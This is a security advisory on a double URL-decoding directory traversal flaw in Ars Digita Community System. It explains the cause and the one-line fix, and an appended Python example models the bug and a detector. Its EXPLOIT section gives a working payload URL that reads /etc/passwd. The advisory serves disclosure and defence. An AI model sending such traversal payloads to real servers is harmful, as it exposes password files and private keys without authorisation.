arsdigita-traverse.txt

Date: 20 Jan 2007
Reported by: Elliot Kendall
Type: packetstorm
Source: packetstormsecurity.com

A directory traversal vulnerability exists in Ars Digita Community System, allowing remote attackers to read arbitrary files with the web server's permissions, including password files and SSL private keys.

Code
`SUMMARY  
=======  
  
A directory traversal vulnerability exists in the Ars Digita Community  
System. A remote attacker could exploit this vulnerability to read  
arbitrary files with the permissions of the web server.  
  
AFFECTED SOFTWARE  
=================  
  
* Ars Digita Community System (ACS) 3.4.9, 3.4.10, and probably earlier  
versions  
  
* Ars Digita Community Education Solution (ACES) 1.1  
  
UNAFFECTED  
==========  
  
* OpenACS all versions  
  
* Ars Digita Community System (ACS) 4.2  
  
* ACS-Java 3.4, 4.0, 4.7.4  
  
IMPACT  
======  
  
A remote attacker could exploit this vulnerability to read sensitive  
files on the affected system. Possible targets could include files  
containing passwords, private keys for SSL certificates, and web server  
logs.  
  
DETAILS  
=======  
  
RFC2396 permits the use of escaped characters in a URI string,  
consisting of a percent sign followed by two hexadecimal digits  
corresponding to the ASCII value of the character. For example, a space  
would be encoded as %20.  
  
The unencoding of these values is typically handled by the web server.  
Affected versions of ACS perform their own decoding operation after  
that done by the web server, so that URIs containing %25, the encoded  
form of the percent character, are decoded twice.  
  
Web servers traditionally also perform sanity checks on URLs to prevent  
them from accessing files in the directory tree outside of the web  
server's configured root directory. One of the most common restricted  
sequences is "../", which refers to the parent directory of the current  
working directory.  
  
Because the second URI decoding that ACS performs occurs after the  
sanity checks done by the web server, a doubly encoded "../" is not  
caught: the server decodes ".%252e/" to ".%2e/", which passes its check,  
and ACS then decodes that to "../". URIs built this way can therefore  
access files outside of the web server's root directory.  
  
SOLUTION  
========  
  
In the request-processor-procs.tcl file, replace the line  
  
set url [ns_urldecode [ns_conn url]]  
  
with  
  
set url [ns_conn url]  
  
EXPLOIT  
=======  
  
This example will retrieve the UNIX password file from a vulnerable  
host whose web root is no more than 8 directories deep from the root  
directory.  
  
http://target.tld/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd  
  
ACKNOWLEDGMENTS  
===============  
  
Thanks to Eve Andersson for finding the source of the bug in the  
application code and providing a fix.  
  
Thanks to the OpenACS development team for helping confirm their  
software is not vulnerable.  
  
--   
Elliot Kendall <[email protected]>  
Network Security Engineer  
Brandeis University  
`
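The following is an added example, not code from the advisory or from ACS. It models in Python the pipeline the DETAILS and SOLUTION sections describe: the web server percent-decodes once and rejects ".." segments, then the affected ACS calls ns_urldecode a second time. The web root, the request paths and the server's check are assumptions made up for the illustration; the payload is the one from the EXPLOIT section. The block also includes a small detection helper that decodes a request path until it stops changing, which catches double (and deeper) encoding of "../" in logs or proxies.

```python
"""Added example: double-decoding directory traversal in an ACS-style request path.
Not part of the advisory; web root and sample requests are constructed."""
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical document root, four directories deep.
WEB_ROOT = "/var/www/acs/www"

# Payload from the advisory's EXPLOIT section (eight doubly encoded "../").
PAYLOAD = "/" + "/".join([".%252e"] * 8) + "/etc/passwd"


def server_decode_and_check(raw_path: str) -> Optional[str]:
    """Model of the web server: one percent-decode, then reject any '..' segment.
    Returns the decoded path, or None when the sanity check rejects it."""
    decoded = unquote(raw_path)  # '%252e' -> '%2e', '%2e' -> '.'
    if any(seg == ".." for seg in decoded.split("/")):
        return None
    return decoded


def acs_vulnerable(raw_path: str) -> Optional[str]:
    """Affected ACS: decodes AGAIN after the server's check, mirroring
    'set url [ns_urldecode [ns_conn url]]'. Returns the file path served."""
    checked = server_decode_and_check(raw_path)
    if checked is None:
        return None
    url = unquote(checked)  # second decode turns '.%2e' into '..'
    return posixpath.normpath(WEB_ROOT + url)


def acs_fixed(raw_path: str) -> Optional[str]:
    """Patched ACS: 'set url [ns_conn url]', i.e. no second decode."""
    checked = server_decode_and_check(raw_path)
    if checked is None:
        return None
    return posixpath.normpath(WEB_ROOT + checked)


def fully_decode(raw_path: str, max_rounds: int = 5) -> str:
    """Decode until the string stops changing, so nested encodings such as
    '%252e' or '%25252e' end up as the character the application would see."""
    cur = raw_path
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur


def is_traversal_attempt(raw_path: str) -> bool:
    """Detection check: flag a request whose fully decoded path walks upward."""
    return any(seg == ".." for seg in fully_decode(raw_path).split("/"))


if __name__ == "__main__":
    print("vulnerable serves :", acs_vulnerable(PAYLOAD))   # /etc/passwd
    print("fixed serves      :", acs_fixed(PAYLOAD))        # stays under WEB_ROOT
    print("single-encoded    :", acs_vulnerable("/..%2f..%2fetc/passwd"))  # None
    print("flagged           :", is_traversal_attempt(PAYLOAD))
```

The single-encoded request is rejected by the server's own check in both versions; only the doubly encoded form slips through, and only when ACS decodes a second time. The detector deliberately decodes to a fixed point rather than a fixed number of rounds, because the attacker chooses how many layers of encoding to stack.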
